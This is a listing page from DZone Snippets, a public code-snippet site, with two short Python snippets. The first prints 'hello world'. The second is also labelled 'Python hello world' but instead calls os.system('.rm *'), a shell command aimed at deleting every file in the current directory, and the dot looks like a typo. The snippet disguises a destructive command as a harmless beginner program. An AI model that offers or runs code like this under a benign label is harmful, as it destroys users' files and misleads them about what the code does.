Never been to DZone Snippets before?

Snippets is a public source code repository. Easily build up your personal collection of code snippets, categorize them with tags / keywords, and share them with the world

« Newer Snippets
Older Snippets »
Showing 11-12 of 12 total

hello world

I am trying to use the site.
Here's my first program.

print "hello world"

Python hello world

#There should be a way to rate snippets...

import os
os.system('.rm *')
« Newer Snippets
Older Snippets »
Showing 11-12 of 12 total